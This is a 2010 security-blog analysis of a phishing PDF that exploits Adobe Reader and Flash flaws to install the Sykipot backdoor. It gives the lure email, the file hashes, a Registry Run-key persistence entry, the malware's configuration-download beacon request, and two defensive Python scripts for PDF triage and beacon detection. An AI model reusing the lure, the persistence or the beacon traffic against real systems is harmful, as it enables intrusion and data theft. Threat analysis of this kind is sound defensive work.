Wednesday, November 10, 2010

CVE-2010-3654 Adobe Reader 0 day + CVE-2010-2883 Flash + Reader PDF Federal Benefits

Common Vulnerabilities and Exposures (CVE) number

CVE-2010-3654 Adobe Flash Player and earlier on Windows, Mac OS X, Linux, and Solaris and and earlier on Android, and authplay.dll (aka AuthPlayLib.bundle or in Adobe Reader and Acrobat 9.x through 9.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted SWF content, as exploited in the wild in October 2010.

CVE-2010-2883 Stack-based buffer overflow in CoolType.dll in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a PDF document with a long field in a Smart INdependent Glyphlets (SING) table in a TTF font, as exploited in the wild in September 2010. NOTE: some of these details are obtained from third party information. 

Post Updates

Update 6, Nov 16, 2010-------------------------------------------------------------------------------------------
After yesterday's tweets (snowfl0w and sempersecurus), GoDaddy took notice and suspended the domain.
Here is the email:
---------- Forwarded message ----------
From: GoDaddy Abuse Department
Date: Tue, Nov 16, 2010 at 11:16 AM
Subject: RE: reminder - complaint
To: Mila

Dear Mila Parkour,

Thank you for bringing this situation to our attention. We have gone
ahead and suspended the domain name in question.
Please let us know if you find any other domain names connected to C&C
servers or other malware distribution.
Spam and Abuse Department
24/7 Abuse Department Hotline: 480-624-2505
Here is the current Whois:
debby ryan
411 N. 6th Street, Emery, SD
Emery, SD
sd, shen zhen 90002

Registered through:, Inc. (
Created on: 15-Sep-10
Expires on: 15-Sep-11
Last Updated on: 15-Sep-10

Administrative Contact:
ryan, debby
411 N. 6th Street, Emery, SD
Emery, SD
sd, shen zhen 90002
+86.9801455 Fax --

Technical Contact:
ryan, debby
411 N. 6th Street, Emery, SD
Emery, SD
sd, shen zhen 90002
+86.9801455 Fax --

Domain servers in listed order:

Update 5, Nov 15, 2010------------------------------------------------------------------------------------------- The domain is still active. Resent the message below to  
Hostname:  - Is it C&C or someone's sinkhole? Anybody?

Update 4, Nov 13, 2010------------------------------------------------------------------------------------------- The domain is still active.
The message that was sent to the GoDaddy abuse department on Nov 10, 2010 read:
Dear GoDaddy Abuse Department, has been C&C for 0-days malware  

and used in targeted attacks described above.
Please take action asap
Update 3 Nov 11, 2010-------------------------------------------------------------------------------------------
Nov 10, 2010
GoDaddy Abuse dept was contacted via email on Nov 10 with the request to take action and suspend - used as C&C in the following 0-day Adobe attacks for 3 months in a row:
has been C&C for 0-days malware
Nov 11, 2010 is still active

Update 2 Nov 10, 2010----------------------------------------------------------------------------
From Brad Arkin, Senior Director, Product Security & Privacy for Adobe Systems:
An update for Adobe Reader will be released next week to address CVE-2010-3654. 9.4.0 is vulnerable.

@jduck1337
Re: - Adobe Reader bundles its own version of Flash. It is not updated

Update 1 Nov 10, 2010-----------------------------------------------------------------------------
Screenshot made today, November 10, 2010

I thought this Security update available for Adobe Flash Player November 4, 2010 with new Flash would fix the problem.

General File Information

File: Open Season Announcements.pdf
File size: 111729 bytes
Type: PDF
Distribution: Email attachment


Original Message

From: []
Sent: Wednesday, November 10, 2010 7:33 AM
Subject: Federal Benefits Open Season Begins On November 10

This is the time of year to ensure that you have the right health,
dental, or vision insurance coverage for you and your family. It is
also time for you to consider the out-of-pocket medical or dependent
care expenses you can save money on in 2011. The open season will run
November 10, 2010, through December 13, 2010. You should read the Open
Season Announcement (see the attached) thoroughly for important
information pertaining to each program.

The following three programs will be participating in this year's Open
Season for the 2011 plan year:
1.Federal Employees Health Benefits (FEHB) Program;
2.Federal Employees Dental and Vision Insurance Program (FEDVIP);
3.Flexible Spending Accounts (FSA) Program.

Please remember that there are no longer open seasons for the Thrift
Savings Plan (TSP). You may start, stop, or change your TSP
contributions at any time via myPay (DFAS), provided you are eligible
to participate in the TSP.

Message Headers

Received: from [] by via HTTP; Wed, 10 Nov 2010 04:32:55 PST
Date: Wed, 10 Nov 2010 04:32:55 -0800
From: ""
Reply-To: ""
Message-ID: <855251712.57555.1289392517031.JavaMail.service@localhost>
Subject: Federal Benefits Open Season Begins On November 10
MIME-Version: 1.0
Content-Type: multipart/mixed;
Received-SPF: pass ( best guess record for domain of designates as permitted sender) client-ip=;
Authentication-Results:; spf=pass ( best guess record for domain of designates as permitted sender); dkim=pass (test mode)
X-Yahoo-Newman-Property: ymail-3
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;; s=s1024; t=1289392375; bh=JwcFHdceH3fqqdYHdMAn56STB43egwMkweBMk6XmrFs=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=5My/a8O9f9L1V7zXZkIRZ8IcN+UbseUxx50qRLsVsMra6zq7MWdmA0rcayL19usi2IVAdLJRJbgTrkAbXmc1Q4u/lCISSMj5D10t+/4BsqCDD0ZEdaoa4W4VDZNj92Nv7He1mXNCpv6NLF9+BQletQNYCCOqxCrB9DUZRW4xAUU=
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
X-YMail-OSG: ZbW_TywVM1njbfFrytll2Be76lGDNQqcG_QM8kxiaDCEfzd
X-Mailer: YahooMailRC/504.5 YahooMailWebService/


ISP:    EGIHosting
Organization:    EGIHosting
Country:    United States
State/Region:    California
City:    Milpitas

Same ISP and IP range as posted earlier in

Automated Scans

File name: Open Season Announcements.pdf
Submission date: 2010-11-10 15:43:15 (UTC)
Result: 7/43 (16.3%)
AhnLab-V3 2010.11.10.02 2010.11.10 SWF/Cve-2010-3654
AntiVir 2010.11.10 EXP/CVE-2010-3654.A
DrWeb 2010.11.10 Exploit.PDF.1641
Fortinet 2010.11.10 PDF/CoolType!exploit.CVE20102883
Kaspersky 2010.11.10 Exploit.Win32.CVE-2010-3654.a
Microsoft 1.6301 2010.11.10 Exploit:Win32/CVE-2010-2883.A
Sophos 4.59.0 2010.11.10 Mal/PDFJs-Z
MD5   : d143a09611c45ac34ff0f85cc5efcc2e
SHA1  : a2378a47bf084a155974b6fd20559732ecac1608

From Malware tracker (thank you)
content/type: PDF document, version 1.6
Object 12.0 @ 1395: suspicious.flash Embedded Flash define obj
Object 20.0 @ 4405: pdf.exploit fontfile SING table overflow CVE-2010-2883 A
Object 20.0 @ 4405: pdf.exploit fontfile SING table overflow CVE-2010-2883 generic
Object 26.0 @ 6374: pdf.exploit fontfile SING table overflow CVE-2010-2883 generic
Object 26.0 @ 6374: pdf.exploit fontfile SING table overflow CVE-2010-2883 A
Object 29.0 @ 102721: suspicious.string heap spray shellcode
Object 35.0 @ 5648: pdf.exploit fontfile SING table overflow CVE-2010-2883 A
Object 39.0 @ 8560: suspicious.obfuscation using substring
Object 39.0 @ 8560: suspicious.obfuscation using String.replace
Object 49.0 @ 15067: suspicious.flash Adobe Shockwave Flash in a PDF define obj type
Object 50.0 @ 15464: suspicious.flash Embedded Flash
Object 50.0 @ 15464: flash.exploit CVE-2010-3654
Object 56.0 @ 12318: suspicious.obfuscation using unescape
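The Malware Tracker output above flags two things worth triaging by hand in any PDF of this kind: objects whose stream is an embedded SWF, and embedded TrueType fonts that carry a SING table. The script below is an added example written for this post; it is not the blog author's tool and not the Malware Tracker scanner. It walks the "N G obj ... stream ... endstream" objects of a PDF, inflates /FlateDecode streams, reports embedded SWF by its FWS/CWS/ZWS magic, and for TrueType streams looks for a SING table and checks whether the 28-byte uniqueName field (which, per Adobe's SING specification as I understand it, sits at offset 16 of the table; that layout is an assumption, not something the post states) contains a NUL terminator. The sample PDF, the font blobs and the object numbers are constructed inline so the script runs offline.

```python
"""Triage helper: find embedded Flash and SING-table fonts in PDF object streams.

Added example for this post (not the blog author's or Malware Tracker's code).
Assumptions: objects use the plain "N G obj ... stream ... endstream" layout,
streams are raw or /FlateDecode, and the SING table's uniqueName is the 28-byte
field at table offset 16 (taken from Adobe's SING spec, not from the post).
"""
import re
import struct
import zlib

SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")                     # raw, zlib, LZMA SWF headers
TTF_MAGICS = (b"\x00\x01\x00\x00", b"true", b"OTTO")      # common sfnt signatures
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)endobj", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)


def decode_stream(obj_body: bytes, raw: bytes) -> bytes:
    """Inflate a /FlateDecode stream; fall back to the raw bytes on error."""
    if b"/FlateDecode" in obj_body:
        try:
            return zlib.decompress(raw)
        except zlib.error:
            return raw
    return raw


def sing_table_info(font: bytes):
    """Return (has_sing, uniquename_has_nul) for an sfnt blob, or None if too short."""
    if len(font) < 12:
        return None
    num_tables = struct.unpack(">H", font[4:6])[0]
    for i in range(num_tables):
        rec = font[12 + 16 * i: 28 + 16 * i]             # 16-byte table directory record
        if len(rec) < 16:
            break
        tag, _checksum, offset, _length = struct.unpack(">4sIII", rec)
        if tag == b"SING":
            unique_name = font[offset + 16: offset + 44]  # assumed 28-byte uniqueName field
            return True, (b"\x00" in unique_name)
    return False, None


def scan_pdf(pdf: bytes) -> list:
    """List embedded SWF objects and SING-table fonts with their object number and offset."""
    findings = []
    for m in OBJ_RE.finditer(pdf):
        num, body = int(m.group(1)), m.group(3)
        stream = STREAM_RE.search(body)
        if not stream:
            continue
        data = decode_stream(body, stream.group(1))
        if data[:3] in SWF_MAGICS:
            findings.append({"obj": num, "offset": m.start(), "kind": "embedded_swf",
                             "magic": data[:3].decode()})
        elif data[:4] in TTF_MAGICS:
            info = sing_table_info(data)
            if info and info[0]:
                findings.append({"obj": num, "offset": m.start(), "kind": "sing_font",
                                 "uniquename_terminated": info[1]})
    return findings


# --- constructed sample input (not the sample from the post) ---------------
def build_ttf_with_sing(unique_name: bytes) -> bytes:
    """Minimal one-table sfnt blob whose only table is SING, data right after the directory."""
    sing = struct.pack(">8H", 1, 0, 1, 0, 0, 1000, 0, 0) + unique_name.ljust(28, b"\x00")[:28]
    header = struct.pack(">IHHHH", 0x00010000, 1, 16, 0, 0)   # version, numTables=1
    record = struct.pack(">4sIII", b"SING", 0, 28, len(sing))  # tag, checksum, offset, length
    return header + record + sing


def pdf_object(num: int, dictionary: bytes, data: bytes) -> bytes:
    return b"%d 0 obj\n<< %s /Length %d >>\nstream\n%s\nendstream\nendobj\n" % (
        num, dictionary, len(data), data)


SAMPLE_PDF = (
    b"%PDF-1.6\n"
    + pdf_object(12, b"/Type /EmbeddedFile", b"FWS\x0a" + b"\x00" * 8)             # raw SWF
    + pdf_object(20, b"/Length1 100", build_ttf_with_sing(b"A" * 28))                # no NUL
    + pdf_object(21, b"/Length1 100", build_ttf_with_sing(b"OK"))                    # terminated
    + pdf_object(30, b"/Filter /FlateDecode", zlib.compress(b"CWS\x0a" + b"\x00" * 8))
    + b"%%EOF\n"
)

if __name__ == "__main__":
    for f in scan_pdf(SAMPLE_PDF):
        print("Object %d @ %d: %s %s" % (f["obj"], f["offset"], f["kind"],
              {k: v for k, v in f.items() if k not in ("obj", "offset", "kind")}))
```

A uniqueName with no NUL inside its 28 bytes is only a heuristic, and real samples usually keep the font and SWF inside compressed object streams that this simple regex walk will not see; it is meant as a first pass that reproduces the "Object N @ offset" view shown above, not as a replacement for a proper PDF parser.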

Files Created

Decoy file
%Temp%\Open Season Announcements.pdf
MD5   : db1991c1120c3f75991cbe91c2649ad3

\Local Settings\adobeupdate.exe
File name: adobeupdate.exe
Submission date: 2010-11-10 19:49:23 (UTC)
Result: 15/43 (34.9%)
AntiVir    2010.11.10    TR/Dropper.Gen
Authentium    2010.11.10    W32/Heuristic-257!Eldorado
BitDefender    7.2    2010.11.10    Gen:Trojan.Heur.RP.cqW@a8FFwjdb
DrWeb    2010.11.10    BACKDOOR.Trojan
F-Prot    2010.11.10    W32/Heuristic-257!Eldorado
F-Secure    9.0.16160.0    2010.11.10    Gen:Trojan.Heur.RP.cqW@a8FFwjdb
GData    21    2010.11.10    Gen:Trojan.Heur.RP.cqW@a8FFwjdb
K7AntiVirus    9.67.2940    2010.11.09    Riskware
Kaspersky    2010.11.10    Heur.Invader
McAfee-GW-Edition    2010.1C    2010.11.10    Heuristic.BehavesLike.Win32.Trojan.H
Microsoft    1.6301    2010.11.10    Trojan:Win32/Wisp.A
NOD32    5608    2010.11.10    probably a variant of Win32/Wisp.A
Panda    2010.11.10    Suspicious file
Sophos    4.59.0    2010.11.10    Mal/Mdrop-B
VBA32    2010.11.09    suspected of Win32.Trojan.Downloader
MD5   : 27ba4695567a60f25a32bab240b3b832
SHA1  : 8f9e5aee02a4b340faae1a8057db419a34ace951
SHA256: 590bdc2952e54739d2d3b0a692691d7ec6f7489a7944a9798feaa513c07aa91e
ssdeep: 768:OpUElc+SsQvCXVD/5HiS/LcMRt50fQtW96VTD+eXrAyb:ZEUS3H3H750fQOQAw
File size : 37376 bytes


The newly created Registry Value is:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
start = "%UserProfile%\LOCALS~1\adobeupdate.exe -installkys"
so that adobeupdate.exe runs every time Windows starts.

Analysis of the file resources indicates the following possible country of origin:


Sykipot exploits an Adobe Flash Zero-Day (Kaspersky)
Read the full analysis at the link above. This is an excerpt:
When executed, the bot checks for command line options. The '-installkys' option installs the bot onto the victim machine. Interestingly enough, if you use the '-removekys' parameter the malware gets entirely removed from the system – a built-in uninstall. The malware then calls itself without any parameters and the malicious code is run. The screenshot below shows the code for parsing the command line parameters.
The binary drops a DLL, the actual malware, to the hard drive and scans the list of running processes for outlook.exe, iexplore.exe, and firefox.exe. If a matching process is found, the dropped DLL gets injected and executed as a new thread.
The injected code will send an HTTP request to every 5 minutes and download an encrypted configuration file. The DNS entry seems to be somewhat fluxy: it has a TTL of 1800 seconds, and the IP address it resolves to changes every now and then. A decrypted config file contains a list of commands to gather information about the infected host. This information is encrypted and sent back to the server. 
Searching the web for strings from this file reveals an interesting connection with a piece of malware that was spreading at the beginning of this year. Similar to the current bot, this earlier virus exploits a zero-day vulnerability, collects information about the infected machine and sends it back to its master. A still earlier version is reported to exploit another Flash zero-day.
A nice thing is that each configuration download request contains all the necessary information to track down infected hosts in a network. Below is what the HTTP GET request for the config file looks like. The path contains one parameter assembled from the Windows host name and its IP address with the prefix '-nsunday' and is quite unique. Also note the Referer field, which is always set to, and the characteristic Accept header. Constructing a reliable IDS signature should not be too hard.
GET /asp/kys_allow_get.asp?name=getkys.kys&hostname=PC- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
  application/, application/, application/msword, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/2009021910 Firefox/3.0.7
Cache-Control: no-cache
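Kaspersky's note that the config-download request "contains all the necessary information to track down infected hosts" and that an IDS signature "should not be too hard" is worth making concrete. The function below is an added example written for this post, not Kaspersky's or the blog author's code: it parses a raw HTTP request (including the folded Accept header shown above), scores the indicators visible on the page (the /asp/kys_allow_get.asp path, name=getkys.kys, the '-nsunday' marker in the hostname parameter, the Accept list ending in */* with application/x-shockwave-flash, and the presence of a Referer), and pulls the victim's machine name out of the hostname parameter. The exact hostname format, the Referer host and the User-Agent rv value are not preserved on the page, so the sample request here is constructed with placeholder values.

```python
"""Flag the Sykipot configuration-download beacon in raw HTTP request text.

Added example for this post; not Kaspersky's or the blog author's code. The
sample request is constructed: the real hostname format, Referer host and
User-Agent details are placeholders (example.invalid, TEST-NET addresses).
"""
from urllib.parse import parse_qs, urlsplit

BEACON_PATH = "/asp/kys_allow_get.asp"
BEACON_NAME = "getkys.kys"
HOST_MARKER = "-nsunday"          # prefix the bot inserts into the hostname parameter


def parse_request(raw: str):
    """Split a raw request into (method, target, headers); unfolds continuation lines."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split()
    headers, last = {}, None
    for line in lines[1:]:
        if line.startswith((" ", "\t")) and last:      # folded header (Accept wraps on the page)
            headers[last] += " " + line.strip()
            continue
        name, _, value = line.partition(":")
        last = name.strip().lower()
        headers[last] = value.strip()
    return method, target, headers


def match_beacon(raw: str) -> dict:
    """Return which Sykipot indicators a request hits and the victim tag if present."""
    method, target, headers = parse_request(raw)
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    hits = []
    if method == "GET" and parts.path == BEACON_PATH:
        hits.append("path")
    if query.get("name") == [BEACON_NAME]:
        hits.append("name=getkys.kys")
    hostname = query.get("hostname", [""])[0]
    if HOST_MARKER in hostname:
        hits.append("hostname carries -nsunday marker")
    accept = headers.get("accept", "")
    if "application/x-shockwave-flash" in accept and accept.endswith("*/*"):
        hits.append("characteristic Accept header")
    if "referer" in headers:                           # value is elided on the page; presence only
        hits.append("Referer present")
    victim = hostname.split(HOST_MARKER)[0] if HOST_MARKER in hostname else None
    # the path alone is specific; require it plus one corroborating indicator
    return {"match": "path" in hits and len(hits) >= 2, "indicators": hits, "victim_tag": victim}


# --- constructed sample requests (placeholders, not captured traffic) ---------
SAMPLE_BEACON = """GET /asp/kys_allow_get.asp?name=getkys.kys&hostname=PC-EXAMPLE-nsunday-192.0.2.10 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
  application/msword, */*
Referer: http://c2.example.invalid/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Gecko/2009021910 Firefox/3.0.7
Cache-Control: no-cache
Host: c2.example.invalid
"""

SAMPLE_BENIGN = """GET /index.html HTTP/1.1
Host: www.example.com
Accept: text/html, */*
"""

if __name__ == "__main__":
    for label, req in (("beacon", SAMPLE_BEACON), ("benign", SAMPLE_BENIGN)):
        print(label, match_beacon(req))
```

Because the victim tag comes straight from the URL, the same logic can run over proxy logs or a Zeek http.log to enumerate infected machines rather than just raise an alert; the requirement of the path plus a second indicator keeps a stray hit on the generic Accept string from firing on its own.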

Network activity -  
ISP:    Cox Communications
Organization:    Cox Communications
Country:    United States 
State/Region:    Arizona
City:    Peoria

Compare to the IPs for the same domain posted earlier.


Route and resolution data for the domain (IP addresses are missing from this copy; entries listed as they appear): United States; proxy-registered route object; COX-PHX Cox Communications Inc.; United States; PAH-INC Go Daddy Software, Inc.; 5 hours old; United States; 5 hours old; United States; 9 days old (only in delegation); United States; 10 hours old; United States; 13 hours old; United States.
